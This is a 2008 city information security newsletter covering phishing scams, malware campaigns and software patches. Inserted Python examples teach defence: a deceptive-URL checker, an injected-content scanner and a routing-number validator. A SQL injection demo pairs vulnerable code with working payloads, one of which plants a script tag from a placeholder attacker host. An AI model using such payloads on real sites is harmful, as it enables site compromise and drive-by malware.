Information Security Newsletter
Newsletter Posted 10/09/2008
This is our latest newsletter. In case you missed our last ones they are still available for viewing right below this one.
The Latest E-Mail Scams
We're seeing similar trends in the SPAM that the City is blocking as we have the last few
weeks. By far the greatest number are some kind of debt consolidation offer, with the next
runner-up being the online pharmacy offers. We've also seen a rise in SPAM relating to
the bank closures, with subject lines like "Wachovia Connection Alert" or "WAMU Customer
Information".
However, there have been several new virus infected emails blocked. Some were of the old,
"You have an e-card" variety, and in the last two days we've seen one with the subject line, "Angelina Jolie
Free Video" and one titled, "Funds wired into your account are stolen". We also had some instances of a virus laden email with a "doc.zip" attachment and
the subject, "Important document for 49". And then, of course, there have been several nasty
malware laden presidential campaign videos being foisted upon us recently.
If you receive a suspicious email, simply delete it.
E-mail Claiming to Be From the FDIC
The Federal Deposit Insurance Corporation (FDIC) has received numerous reports of a
fraudulent e-mail that has the appearance of being sent from the FDIC.
The subject line of the e-mail states: "Funds wired into your account are stolen." The
e-mail tells recipients that the proceeds of identity theft crimes have been
wire-transferred into their bank account. The e-mail then directs recipients to open and
review an attached copy of their bank account statement. The attached file is actually an
unknown executable file.
Recipients should consider the intent of the executable file as a malicious attempt to
collect personal or confidential information, some of which may be used to gain unauthorized
access to on-line banking services or to conduct identity theft.
The FDIC does not issue unsolicited e-mails to consumers. Financial institutions and
consumers should NOT open the executable file attached to the fraudulent e-mail.
Attackers Mix Online, Offline Exploits to Mask Financial Fraud
Professional cybercriminals
are deploying multichannel attacks that split the attack cycle into pieces that may not look
like they are related. This combination of offline and online activity lets the attacker
stay under the radar of forensics or other incident tracking: for instance, cashing out through wire
transfers and ATM transactions as well, rather than through a single online transaction with a bank.
One example of this type of attack is the Coreflood botnet Trojan, which is notorious for
performing reconnaissance on its victims. Coreflood has stolen user account information,
Webpage content, digital credentials, and browser cookies. And it made sure the server it
used appeared to be from the same geographic location as the victim.
Banking customers can
protect themselves from these multipronged, and often silent, attacks with the usual best
practices: updated antivirus and anti-spyware, patching one's machine, and never clicking on
links in an email purportedly from a financial institution.
Symantec Warns of Alarming Spam Trends
Symantec's monthly State of Spam report claims that
malware-laden messages are far more common than in the first half of the year. The security
firm estimates that 1.2 percent of all email messages sent contain a malicious payload.
Overall, Symantec found that spam comprises some 78 percent of global email volume.
While attached .zip and .rar archives were the most popular method for spreading malware,
researchers also found that embedding attack code within the source of the message
itself is becoming popular. "The increase began in May 2008 and continues to the present,"
the company said in the report. "During this period, there has also been an increase in
email messages carrying malware payloads, not just links to malicious code." The majority of
the malicious payloads were generic Trojan, downloader and information-stealing
applications.
Barclays Hit by Phishing Scam
Barclays is the latest bank to be hit by a phishing
campaign, which encourages customers to enter their personal details on a fake site. The
email scam, entitled "restore your account", encourages consumers to click through to a hoax
Barclays log-in site in a bid to extract personal banking details. Barclays denies having
anything to do with the email.
The bank is urging customers to delete the email or forward
it on to Barclays' internet security address.
Malware Masquerades as YouTube Video
Security experts are warning users of a new malware
attack posing as a pornographic YouTube video. Researchers at McAfee said that the
newly-discovered attack attempts to lure the user to a malicious site by way of a YouTube
page promising an adult movie.
YouTube's terms of service prohibit the posting of obscene
content, and the company removes videos it deems inappropriate. But the attack does not
actually post the videos on YouTube. Instead, the attackers have constructed a fake YouTube
user account. Forum spam messages are then used to link to the profile pages, which in turn
offer "video" links hosted on an external site. Believing the page to be hosting a
legitimate YouTube video, the user follows the link, which attempts a number of
browser exploits as well as a fake codec attack in which the user is told that an
"additional file" is needed to display the video.
Google Trends Used to Propagate Malware
Researchers at Webroot have discovered that malware operators have begun using Google Trends
information to assist in malware propagation attempts. By abusing popular blog hosting sites
such as Windows Live Spaces and applying Google Trends data on popular search terms,
operators are able to increase the chance of a victim selecting a malicious web site during
a search.
Free Security Scan Tool from Verizon
With industry estimates of more than a million viruses stalking the unprotected computers of
Internet users, the need for adequate protection from these and other threats has never been
greater. Verizon Security Advisor provides consumers with a fast and simple way of
determining their level of risk and follows up with tips and instructions on how to stay out
of trouble.
Internet users can access the free security scan at http://www.verizon.net/securityadvisor
Verizon also offers its customers free parental controls and has launched a publicly available Parental Control
Center offering tips and tools for parents on how to protect their children when they're
online. The Parental Control Center features simple downloading of the parental-control
software (if you're a customer) and tutorials on subjects such as Social Networking and Safe Surfing for Kids.
Links are available to Web sites for organizations like WiredSafety, the largest cybersafety
organization, and the National Center for Missing and Exploited Children's Cyber Tipline.
The center is available at http://www.verizon.net/parentalcontrol.
Two New iPhone Security Flaws
Security researcher Aviv Raff disclosed two iPhone security flaws last week that could allow
attackers to trick users into unknowingly surfing to malicious destinations.
He had brought both vulnerabilities to Apple's attention back in July, but the company
had not addressed them with patches, so he disclosed the flaws publicly.
The first flaw exists in the iPhone's Mail application and its Safari web browser, which tend to
truncate parts of long URLs when they're displayed. That can allow evil-doers to disguise
malicious URLs without the user having a chance to view them in full.
"In most mail clients... you can just hover [over] the link and get a tooltip [showing] you
the actual URL that you are about to click," explained Raff. "In iPhone it's a bit
different. You need to click the link for a few seconds in order to get the tooltip. Now,
because the iPhone screen is small, long URLs are automatically cut off in the middle."
He explained that it's possible for a blackhat to devise a long URL beginning with a trusted
domain name but which actually points to an entirely different location. The iPhone user
would only see the familiar-looking part of the domain name and therefore might easily be
tricked into clicking on a malicious link.
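To show the trick concretely, here is a short added Python example (ours, not code from the article, from Raff or from Apple). It builds a few made-up links, one using the "user@host" form of a URL and one using a long subdomain of the attacker's domain, and compares what a narrow, middle-truncated display shows with the host the browser will really connect to. The bank and attacker hostnames are placeholders.

```python
from urllib.parse import urlsplit

# Constructed links for this demonstration; the bank and attacker names are
# placeholders, not domains from the newsletter.
TRUSTED_HOST = "www.examplebank.com"
SAMPLE_LINKS = {
    # Ordinary link to the trusted site.
    "legit": "https://www.examplebank.com/accounts/statement/2008/09/view?id=12345",
    # Everything before '@' is userinfo; the browser connects to attacker.example.
    "userinfo": "https://www.examplebank.com.secure-login.account-center.examplebank.com"
                "@attacker.example/www.examplebank.com/login",
    # A long subdomain of the attacker's domain that merely starts with the bank name.
    "subdomain": "https://www.examplebank.com.secure-login.account-center."
                 "attacker.example/www.examplebank.com/login",
}


def effective_host(url: str) -> str:
    """Return the host the browser will actually connect to, lower-cased."""
    return (urlsplit(url).hostname or "").lower()


def is_trusted(url: str, trusted: str = TRUSTED_HOST) -> bool:
    """True only if the effective host is the trusted name or one of its subdomains.

    A prefix or substring test on the URL text is exactly what the truncated
    display tricks the eye into doing, so the check is made on the parsed host.
    """
    host = effective_host(url)
    return host == trusted or host.endswith("." + trusted)


def truncate_middle(url: str, width: int = 40) -> str:
    """Mimic a narrow display that keeps the start and end of a long URL."""
    if len(url) <= width:
        return url
    keep = (width - 3) // 2
    return url[:keep] + "..." + url[-keep:]


def classify(url: str) -> dict:
    """What the user sees versus where the link really goes."""
    return {
        "shown": truncate_middle(url),
        "host": effective_host(url),
        "trusted": is_trusted(url),
    }


if __name__ == "__main__":
    for name, link in SAMPLE_LINKS.items():
        print(name, classify(link))
```

Both deceptive links display as "https://www.exampl...mplebank.com/login" at 40 characters, while the parsed host is attacker.example or a subdomain of it. The lesson for any link-checking code is the same as for the user: judge the parsed host, never the visible prefix.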
Raff said iPhone Mail is also vulnerable because it automatically downloads images linked in
HTML-formatted emails.
Most email client software allows users to make downloading of images require approval in
each instance. Setting that option helps email users protect themselves against spammers,
because spammers can learn when they've reached an active email account if the recipient
opens a spam email and downloads images.
"This one is not just a trivial bug," Raff said. "It's actually a pretty dumb design flaw,
which was already fixed by all other mail clients ages ago."
Researcher Finds Evidence of Massive Website Compromise
Several criminal gangs have acquired
administrative log-in credentials for more than 200,000 Web sites — including the one used
by the U.S. Postal Service — and have used the compromised domains to attack unsuspecting
users’ PCs with a notorious hacker exploit kit, a researcher said Friday.
More than a month
ago, the director of security research at Aladdin Knowledge Systems Inc. found and
infiltrated a server belonging to a longtime customer of Neosploit, a hacker tool kit used
by cybercriminals to launch exploits against browsers and popular Web software such as Apple
Inc.’s QuickTime or Adobe Systems Inc.’s Adobe Reader. On that server, he uncovered logs
showing that two or three hacker gangs had contributed to a massive pool of Web site
usernames and passwords.
“We have counted more than 208,000 unique site credentials on the
server,” he said, “and over 80,000 had been modified with malicious content.” The site
credentials were only the means to an end: The 80,000 modified sites were used as attack
launchpads. Each served up exploit code provided by the Neosploit kit to any visitor running
a Windows system that had not been fully patched.
Remember to keep your operating systems and applications patched and up to date.
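For site owners, the practical check is to look for content on your own pages that you did not author. The following is an added Python example (ours, not from Aladdin or the article) that scans a page for the tell-tale signs of injected content: invisible or zero-size iframes, script and iframe sources on hosts you do not own, and tags appended after the closing </html>. The sample page and hostnames are constructed for the demonstration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed sample page: a normal article page with an allowed third-party
# widget, plus an invisible iframe and an off-site script appended after
# </html>, the pattern seen on mass-compromised sites. Hosts are placeholders.
SAMPLE_PAGE = """<html><head><title>Postal rates</title>
<script src="/js/site.js"></script></head>
<body><h1>Rates</h1><p>First-class mail ...</p>
<iframe src="http://widgets.partner.example/rates" width="300" height="200"></iframe>
</body></html>
<iframe src="http://bad.example/in.cgi?3" width="0" height="0" style="visibility:hidden"></iframe>
<script src="http://bad.example/js.js"></script>
"""


def _dimension(value):
    """Parse a width/height attribute; None if absent or not a plain number."""
    if value is None:
        return None
    try:
        return int(value.strip().lower().rstrip("px"))
    except ValueError:
        return None


class InjectedContentScanner(HTMLParser):
    """Flag iframes and scripts that look injected rather than authored."""

    def __init__(self, allowed_hosts):
        super().__init__()
        self.allowed_hosts = {h.lower() for h in allowed_hosts}
        self.after_html_close = False
        self.findings = []  # (tag, src, [reasons])

    def _off_site(self, src):
        host = (urlsplit(src).hostname or "").lower()
        return bool(host) and host not in self.allowed_hosts

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = a.get("src")
        if tag not in ("iframe", "script") or not src:
            return
        reasons = []
        if tag == "iframe":
            w, h = _dimension(a.get("width")), _dimension(a.get("height"))
            if (w is not None and w <= 1) or (h is not None and h <= 1):
                reasons.append("zero-size")
            style = (a.get("style") or "").replace(" ", "").lower()
            if "visibility:hidden" in style or "display:none" in style:
                reasons.append("hidden")
        if self._off_site(src):
            reasons.append("off-site")
        if self.after_html_close:
            reasons.append("after </html>")
        if reasons:
            self.findings.append((tag, src, reasons))

    def handle_endtag(self, tag):
        if tag == "html":
            self.after_html_close = True


def scan_page(html, allowed_hosts):
    """Return the list of suspicious (tag, src, reasons) found in the page."""
    scanner = InjectedContentScanner(allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE, ["widgets.partner.example"]):
        print(finding)
```

Run it over a crawl of your own site with the hosts you legitimately embed in the allow-list; anything it returns deserves a look at the file's modification time and at who had FTP or admin credentials for that directory. Relative sources such as /js/site.js are not flagged, since they are served from the site itself.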
Most U.S Hotels Vulnerable to Malicious Attacks
Most U.S. hotels are vulnerable to malicious attacks and are "ill prepared" to protect their
guests from internet security problems, claims a study published by Cornell University.
The study, "Hotel Network Security: A Study of Computer Networks in U.S. Hotels", examined
the security of 147 hotels through surveys, interviews and on-site testing.
"Many hotels have flaws in their network topology that allow for exploitation by malicious
users, thereby resulting in the loss of privacy for guests," the study says.
For guests, study author Ogle recommended connecting to the internet using a Virtual Private Network
(VPN), having updated anti-virus and firewall software, and making sure each secured website
starts with "https://" rather than "http://".
Smartcard Hack
Boffins (finally) publish hack for world’s most popular smartcard. Two research papers
published Monday have finally made it official: the world’s most widely deployed radio
frequency identification (RFID) smartcard - used to control access to transportation
systems, military installations, and other restricted areas - can be cracked in a matter of
minutes using inexpensive tools.
One paper - published by researchers from Radboud
University in Nijmegen, The Netherlands - describes in detail how to clone cards that use
the Mifare Classic. The chip is used widely throughout the world, including in London’s
Oyster Card, Boston’s Charlie Card, and briefly by a new Dutch transit card.
Manufacturer
NXP and the Dutch government had tried in vain to prevent the researchers from disclosing
their findings, arguing that the findings would enable abuse of security systems that rely
on the card.
WinZip Releases Version 11.2 SR-1
WinZip has released version 11.2 SR-1 to address a
vulnerability. This vulnerability is due to flaws in the "gdiplus.dll" library included with
the affected versions of the software. Exploitation of this vulnerability may allow an
attacker to execute arbitrary code.
US-CERT encourages users and administrators to review
the WinZip 11.2 SR-1 release notes and apply any necessary updates to help mitigate the
risks.
Apple Issues Java updates
Apple has issued updates for the Java components of its two most
recent OS X releases. The three security fixes address a total of 38 Common Vulnerabilities
and Exposures (CVE) entries in Java. Each of the fixes addresses errors which could lead to
remote code execution.
Apple said that the errors include both Mac-specific and
Java-specific flaws. While Sun Microsystems develops and maintains Java software for several
operating systems, Apple is among the vendors that have opted to develop Java components
in-house.
******************************************************************************************************************
Newsletter Posted 09/29/2008
The Latest E-Mail and Web Scams
There have been a rash of new email and website scams, some of which we will address in this newsletter. Some of the new phishing
scams take advantage of all of the frightening economic and housing news. Criminals are sending out emails with subject lines such
as "Foreclosure Assistance", or "Debt Relief", and new ones today titled "Merill Lynch Customer Support" and "Merrill Lynch
Update". Expect some soon titled, "WAMU Update". The City's email filtering software, Postini, is catching most of these, but some
may make it through or you might inadvertently release them from Postini. These will either infect your computer directly or give
you a link to a poisoned web site.
We are also seeing many instances of legitimate web sites that are infected. These sites pop up a message saying that your computer
has a virus, along with an offer of an antivirus you can download. These AV applications are fake, and in fact will infect your
computer with a Trojan (a malware application that takes over control of your computer).
There are several other new scams that take advantage of recent news, including ones about the presidential election, Dept of
Homeland Security and hurricane relief. And finally, the "You have an e-greeting" has resurfaced.
If you receive a suspicious email, simply delete it. If you get a pop-up on a web site about an antivirus program, shut
down your web browser immediately.
Infected Software Fakes on the Rise
Spam e-mail that contains links to malware bearing viruses and Trojans is on the increase, particularly spam disguised as
legitimate software, security vendors warn.
One common ruse involves the circulation of fake copies of popular software, which infect users' systems upon installation. In a
statement Wednesday, Symantec pointed to the example of a "very high profile attack" involving fake versions of Microsoft's browser,
Internet Explorer 7.
Adobe also recently issued a warning that fake copies of its Flash plugin had been circulated via fake news video pages that
prompt users to download the malware. Ironically, another IT security company Sophos, noted that Symantec itself fell victim to
such hoaxes.
Malware Poses as iPhone Game
Malware writers are spamming e-mails with a file posing as a popular iPhone video game, according to researchers at Sophos. In
fact, the file contains a Trojan, which ironically only runs on Microsoft Windows. Still, Sophos said the Trojan can potentially
allow a hacker to take over an infected PC.
The Trojan, identified by Sophos as Troj/Agent-HNY, is being spread via e-mail as an attachment dubbed Penguin.Panic.zip after the
popular “Penguin Panic” game for the iPhone. Hoping to snare unsuspecting video game fans, the spam e-mails contain subject lines
such as “Virtual iPhone games!” and “Apple: The most popular game!”
“It’s your bog-standard malicious Trojan horse, designed to hand control of the compromised computer over to a third-party hacker,”
said the senior technology consultant at Sophos. “That hacker can then take over the compromised PC to download further malware,
or launch spam campaigns, install spyware to steal your identity or launch a distributed denial-of-service attack. Because so many
Trojan horses these days download additional code from the Internet, hackers can change the ultimate payload at anytime they
wish – they just update the file which the Trojan tries to download.”
Fake Celebrity Websites Infecting With Malware
Attacks through phony celebrity websites have continued to spawn. According to new data from McAfee, a user searching for a variety
of items (wallpapers, screensavers, photos, etc.) relating to one specific celebrity has, on average, an 18 percent chance of
encountering malware in one form or another. Such malware is often served up by a "fake" celebrity website whose primary purpose
is to shove Trojans and worms onto the desktops of the unwary. These websites differ from standard malware landing pads in that they
try to appear as a legitimate source of news.
The Most Dangerous Celebrities To Google
Brad Pitt has overtaken Paris Hilton as the most dangerous celebrity to search for in cyberspace according to Internet security
company McAfee. For the second year running, McAfee entered the glamorous world of Hollywood to reveal the riskiest celebrities in
cyberspace.
Checking in on your famous friends is not only a guilty pleasure, but seriously dangerous for your PC. Fans searching for "Brad
Pitt," "Brad Pitt downloads," and Brad Pitt wallpaper, screen savers and pictures have an 18% chance of having their PCs infected
with online threats, such as spyware, spam, phishing, adware, viruses and other malware.
Cybercriminals are using A-listers' names and images, like Beyonce and Justin Timberlake, to lure Internet users who surf the Web
for the latest gossip, screen savers and ringtones to "fake" Web sites that look legitimate.
Actors Brad Pitt and Justin Timberlake are the most dangerous men to seek on the Internet, while Beyonce and Heidi Montag top the
list for women. Paris Hilton, who topped 2007's most dangerous celebrities, is noticeably absent from this year's list. Also absent
is Britney Spears who was ranked #4 in 2007.
Clickjacking - a New Attack Vector on the Web
There are public reports of a new attack vector, referred to as "clickjacking," which affects most web browser applications. According to
multiple vendors and security researchers, this method could cause a browser to follow malicious links without the user's knowledge
or consent, even when all common scripting functions (JavaScript, ActiveX) have been disabled. The details of the attack vector
and accompanying proof-of-concept exploit code have not been made public at this time.
Business Week Web Sites Compromised
The Web site of BusinessWeek magazine suffered a major SQL injection attack in recent days that left it hosting malware on hundreds
of its pages. Once a site has been compromised through such a server-side weakness, the injected scripts could, in principle, launch anything the
attacker desires; the code currently included attacks visitors automatically using JavaScript. That means a visitor could be hit by malware
just by landing on one of the pages, without interacting in any way. Luckily, according to Sophos, the code that's still on
the magazine site pointed to a Russian site that appeared to be nonfunctioning. A similar attack was used earlier in 2008 to
compromise 500,000 legitimate Web sites in a period of days.
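What makes an attack like this possible is a page that copies user input straight into its SQL text. The following added Python example (ours, not BusinessWeek's code and not from Sophos) uses an in-memory SQLite database, constructed for the demonstration, to show the vulnerable form beside the parameterised fix: one attacker-supplied value reads rows it should not, and a second appends a script tag to every stored article, which is how the mass attacks of 2008 turned legitimate pages into malware launchpads. The executescript() call models a database driver that accepts several statements in one request; SQLite's own execute() would refuse the second statement.

```python
import sqlite3

# Constructed sample schema and content; an in-memory SQLite database stands in
# for the site's real database. Hostnames in the payload are placeholders.
SCRIPT_TAG = '<script src="http://bad.example/x.js"></script>'


def setup():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, slug TEXT, "
        "body TEXT, published INTEGER, views INTEGER DEFAULT 0)"
    )
    conn.executemany(
        "INSERT INTO articles (slug, body, published) VALUES (?, ?, ?)",
        [
            ("markets-today", "<p>Stocks rose on Monday.</p>", 1),
            ("draft-merger", "<p>Unpublished draft.</p>", 0),
        ],
    )
    conn.commit()
    return conn


# --- Vulnerable: the request parameter is pasted into the SQL text ---------

def fetch_body_vulnerable(conn, slug):
    sql = "SELECT body FROM articles WHERE published = 1 AND slug = '" + slug + "'"
    return [row[0] for row in conn.execute(sql)]


def record_view_vulnerable(conn, slug):
    # executescript() runs every statement in the string, modelling a server
    # whose driver accepts stacked statements in one request.
    sql = "UPDATE articles SET views = views + 1 WHERE slug = '" + slug + "'"
    conn.executescript(sql)


# --- Fixed: parameterised queries; the input can only ever be a value ------

def fetch_body_safe(conn, slug):
    sql = "SELECT body FROM articles WHERE published = 1 AND slug = ?"
    return [row[0] for row in conn.execute(sql, (slug,))]


def record_view_safe(conn, slug):
    conn.execute("UPDATE articles SET views = views + 1 WHERE slug = ?", (slug,))
    conn.commit()


def all_bodies(conn):
    return [row[0] for row in conn.execute("SELECT body FROM articles ORDER BY id")]


# Attacker-controlled "slug" values (constructed).
# Closes the quoted string and makes the WHERE clause true for every row.
READ_ALL = "' OR '1'='1"
# Ends the first statement and adds a second one that appends a script tag
# to every article body; the trailing quote from the template closes '1'.
INJECT_SCRIPT = "x'; UPDATE articles SET body = body || '" + SCRIPT_TAG + "' WHERE '1' = '1"


if __name__ == "__main__":
    conn = setup()
    print("vulnerable read:", fetch_body_vulnerable(conn, READ_ALL))
    print("safe read:      ", fetch_body_safe(conn, READ_ALL))
    record_view_vulnerable(conn, INJECT_SCRIPT)
    print("after injection:", all_bodies(conn))
```

With the parameterised versions the same two payloads are just odd-looking slugs that match nothing, which is the whole point: the database never parses user input as SQL.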
Letter Scam - Pay Taxes on the Money You "Won"
A new snail mail letter scam urges recipients to pay taxes on money ‘won’. The Waterford, New York, Office of the Public Safety
Commissioner is warning residents to beware of a scam designed to lure letter recipients into paying taxes on money the letter
claims they won. A Waterford resident received the letter, which claims the recipient won $125,000. The letter goes on to say the
recipient can claim the cash once he or she pays $2,975 in taxes. The letter asks the recipient to send the money through Western
Union or Moneygram. A check is included for $4,875, but the letter asks the recipient to call before cashing it. Police say the
letter was sent as a mass mailing, and recipients should disregard it.
Mozilla Patches 11 Bugs in Firefox
Mozilla Corp. late Tuesday patched 11 vulnerabilities in Firefox 3.0, more than half of them labeled “critical,” and fixed 14 flaws
in the older Firefox 2.0.
Firefox 3.0.2 quashes six critical bugs, four marked “high,” and one pegged as “low” in Mozilla’s four-step threat ranking system.
Among the most serious were four stability bugs in the browser's graphics rendering, layout and JavaScript engines that can crash
the program and might be exploitable with malicious code. "Some of these crashes showed evidence of memory corruption under certain
circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code," said Mozilla
in the accompanying advisory.
Mozilla also updated the older Firefox to 2.0.0.17, patching all but one of the bugs fixed in 3.0.2, but also addressing several
issues specific to the aging browser.
Apple Releases Java Updates for Mac OS X 10.4 and 10.5
Apple has released updates for Java for Mac OS X 10.4 and 10.5 to address multiple vulnerabilities. These vulnerabilities may allow
an attacker to execute arbitrary code. US-CERT encourages users to review Apple Articles HT3178 and HT3179 and apply any necessary
updates to help mitigate the risks.
Is Your Webcam Watching YOU!?
Cover your webcams and unplug your microphones, because the latest freely-available hacker tools could use your own hardware against
you without your knowledge.
Security specialist Prevx demonstrated some of the latest scary techniques being used to take unsuspecting web users' credit card
details, passwords and personal information, as well as turn on your webcam and watch you.
Worryingly, something as simple as a failure to update Adobe Acrobat reader and then clicking on the wrong PDF file could put your
PC at risk, and the real concern is the increase in 'zero day exploits' – unpublicised or previously unknown exploits that allow
hackers to seize control of computers.
******************************************************************************************************************
Newsletter Posted 09/09/2008
Some New E-Mail Scams
We're all familiar with e-mail spam offering prescription drugs, cut-rate software and herbal potions.
But spammers are becoming increasingly sophisticated in delivering their ploys. Appearing new this summer was e-mail with the
subject lines "Get help today with Drug Rehab Info" or "Overcome Alcoholism Today", illustrated with photographs of people who
seem depressed.
"It's one of their more sinister attacks," said Dermot Harnett, the editor of a new report from Symantec. "If you open it, it will
bring you to a sign-up page asking for your name, address and e-mail information. It's the first step in trying to get credit card
information."
As always we remind you to remain skeptical and make sure all your friends, and especially those most vulnerable, know
that if it seems too good to be true, it probably is.
Hit Man E-Mail Scam Returns
The IC3 (the FBI and DOJ's online internet crime reporting site) continues to receive thousands of reports concerning the hit
man e-mail scheme. E-mail content has evolved since late 2006; however, the messages remain similar in nature, claiming the sender
has been hired to kill the recipient.
Two new versions of the scheme began appearing in July 2008. One instructed the recipient to contact a telephone number contained
in the e-mail and the other claimed the recipient or a "loved one" was going to be kidnapped unless a ransom was paid. Recipients
of the kidnapping threat were told to respond via e-mail within 48 hours. The sender was to provide the location of the wire
transfer five minutes before the deadline and threatened bodily harm if the ransom was not received within 30 minutes of the time
frame given. The recipients' personally identifiable information (PII) was included in the e-mail to promote the appearance that
the sender actually knew the recipient and their location.
In some instances, the use of names, titles, addresses, and telephone numbers of government officials, business executives and/or
victims' personally identifiable information are used in an attempt to make the fraud appear more authentic.
Individuals who receive e-mails containing threats of violence and their PII are encouraged to contact law enforcement as
well as file a complaint at www.IC3.gov.
Experts Warn of Hurricane-related Website Scams
With all of the recent hurricane activity, internet users are being reminded that not every storm-related website is a benign
one.
For the past several days, handlers at the SANS Internet Storm Center have listed scores of recently launched websites that refer
in some way to Gustav, Hannah or Ike.
"Many of the domain names being registered are legitimate and are redirecting to sites that support law-abiding charities," Marcus
Sachs, the Storm Center's director, wrote Monday in a blog post. "Unfortunately though, many more are either parked in a
'for sale' status, or are associated with IP addresses known to host malicious software, spyware, or other hazardous
content."
Buying up domain names that refer to popular news events is not uncommon, as individuals hope to either sell the domains or earn
money through click-through advertising revenue.
However, sometimes their motives turn malicious, as was evidenced for the first time on a widespread basis following Hurricane
Katrina. In that case, a number of bogus websites popped up that claimed to be legitimate charities, such as the American Red
Cross.
Individuals are advised to be wary of emails that appear to be requests to donate money to a legitimate charity. Users should
consult the Better Business Bureau's list of charities to affirm an organization's legitimacy.
E-Mail Survey Scam
This is another case of a new scam that is happening elsewhere but could very well be seen here soon.
An e-mail survey sent to Grants Pass, Oregon, area residents that offered $90 to answer questions for a bank turned out to be a
scam run electronically from Valencia, Spain. The e-mail used a phony Home Valley Bank logo and asked for personal information
the real bank says it would never request by phone or e-mail. And the scam hijacked a phone number for a health care organization
in Wisconsin as its fake contact number, forcing the organization to waste time answering a number of angry phone calls before
the scam was discovered.
Home Valley Bank has blocked any transactions involved with the scam.
Scam Targets Time Warner Cable Customers
Hundreds of people have already been affected by a new phishing scam that tries to get personal information over the
internet and is targeting cable-TV customers. It comes in the form of an email that appears to be from Time Warner Cable. Time
Warner has received more than 200 emails related to the phishing scam. A spokesperson for Time Warner told News 4 the company
would never send out an email asking for personal information or bank/credit card account information.
Phishing Scam Targeting Bank of America Customers
The Altamonte Springs, Florida, Police Department announced that the Bank of America Fraud Response team is currently investigating
an e-mail “phishing” scam that attempts to obtain unauthorized access to banking software including Bank of America Direct. Recent
fraudulent e-mails appearing to be from Bank of America have been identified as phishing e-mails.
The e-mail may ask customers to verify confidential account information by clicking on a Customer Verification Form with a
fraudulent link provided in the e-mail. The message may refer to a required or mandatory confirmation necessary for a routine
software upgrade.
E-Mail Scam Targeting Law Firms Ensnares a Lawyer in Atlanta
I include this to emphasize the fact that anyone can become a target in this battle, and just because you went to a lot
of college doesn't mean you can't be fooled.
A lawyer in Atlanta who often handles legal transactions with Asian clients and often via email, was understandably fooled by an
email from Taiwan asking him to help collect a debt in the United States.
The "debtor company" sent him a cashier's check for nearly $200,000 and he deposited it in his trust account before wiring the
money to a South Korean bank. The check, of course, was counterfeit.
The attorney waited three days after the check was deposited before wiring the money, as his bank had told him that was enough
time to ensure the check had cleared. However, the scammers had changed the nine-digit routing number at the bottom of the check
so that it was routed to a different bank than the one named, resulting in a delay in processing. The lawyer's bank is now suing
him for the money, claiming that it extended him provisional credit when it wired the money to South Korea.
The scammer identified itself as Tah Tong Textile Co., a real company that trades on the Taiwanese stock exchange. However, the
attorney now says he's pretty sure there is no connection between that company and the scammers who contacted him.
There are reports of at least seven more attorneys who have fallen prey to similar email scams across the country.
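The altered routing number is the detail worth dwelling on: the MICR line at the bottom of a check is printed by whoever made the check, so it is attacker-controlled. The following is an added Python example (ours, not from the article or any bank) showing the checks a receiving office can make before treating a large check as good. It validates the ABA routing number checksum and prefix, then compares the number against the one independently on file for the bank named on the check. The bank directory and the routing numbers in it are constructed for the demonstration (checksum-valid made-up values, not real banks' numbers); passing the checksum is necessary but never sufficient, since a forger can print any valid number.

```python
# ABA routing transit number checks. The checksum formula is the published ABA
# one; the "bank directory" below is constructed for this example and its
# routing numbers are checksum-valid made-up values, not real banks'.
BANK_DIRECTORY = {
    "Constructed Trust Company": "011234564",
    "Example Savings Bank": "121234564",
}

# First two digits of a routing number fall in these assigned ranges
# (00-12 by Federal Reserve district, 21-32 thrifts, 61-72 electronic
# transactions, 80 traveler's cheques); anything else is not a bank.
ABA_PREFIX_RANGES = ((0, 12), (21, 32), (61, 72), (80, 80))


def aba_checksum_ok(routing: str) -> bool:
    """3*(d1+d4+d7) + 7*(d2+d5+d8) + 1*(d3+d6+d9) must be a multiple of 10."""
    if len(routing) != 9 or not routing.isdigit():
        return False
    d = [int(c) for c in routing]
    total = 3 * (d[0] + d[3] + d[6]) + 7 * (d[1] + d[4] + d[7]) + (d[2] + d[5] + d[8])
    return total % 10 == 0


def aba_prefix_ok(routing: str) -> bool:
    prefix = int(routing[:2])
    return any(lo <= prefix <= hi for lo, hi in ABA_PREFIX_RANGES)


def check_routing_number(routing: str, bank_named_on_check: str, directory=BANK_DIRECTORY):
    """Return (ok, reason).

    The checksum catches misprints and clumsy alterations; the decisive test
    is whether the number matches what is independently on file for the bank
    whose name is printed on the check.
    """
    routing = routing.replace(" ", "")
    if not aba_checksum_ok(routing):
        return False, "checksum failed (misprinted or altered MICR line)"
    if not aba_prefix_ok(routing):
        return False, "prefix not in an ABA-assigned range"
    expected = directory.get(bank_named_on_check)
    if expected is None:
        return False, "bank not in directory; verify by phone using a published number"
    if routing != expected:
        return False, f"routing number belongs elsewhere; {bank_named_on_check} is {expected}"
    return True, "routing number matches the named bank"


if __name__ == "__main__":
    for routing, bank in [("011234564", "Constructed Trust Company"),
                          ("011234565", "Constructed Trust Company"),
                          ("121234564", "Constructed Trust Company")]:
        print(routing, bank, "->", check_routing_number(routing, bank))
```

The third case is the Atlanta scenario: a perfectly valid routing number that simply belongs to a different bank than the one printed on the check. Only a comparison against an independent source catches it, and none of this replaces waiting for the check to actually clear rather than for provisional credit to post.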
Apple Confirms iPhone Security Bug, Promises Patch
Apple Inc. today said it will patch a bug in the iPhone's password-protected locking feature next month in a software update for
the iconic smart phone.
In the meantime, Apple suggested users apply the work-around recommended by several users on the Apple support forum: "[Set] the
iPhone so that double-clicking the home button will take the user directly to the home screen, which, if password protection is
turned on, will be the unlock screen."
The flaw lets anyone sidestep iPhone passcode locking by simply tapping "Emergency Call" on the password-entry screen, then
double-tapping the Home button.
By default, a double-tap of the Home button brings up the iPhone's Favorites, a list of frequently called contacts, and those
contacts' information, including phone numbers and addresses. If any of the contacts have e-mail or Web addresses associated with
them, the trick allows access to the iPhone's e-mail application and Safari browser, respectively.
The bug also affects the iPod Touch.
Fake Twitter Profile Punts Orkut Attack
Miscreants are using a fake Twitter profile in a bid to spread malware that harvests login credentials for Orkut.
Updates to the fake Twitter profile are supposedly being followed by 17 punters, but they're all fake, according to Chris Boyd,
director of malware research at IM security firm Facetime.
The profile is designed to trick would-be marks into viewing a photo album on Orkut, which supposedly requires a Flash update to
view. This bogus Flash update is contaminated by malware, specifically the OrkutTron Trojan.
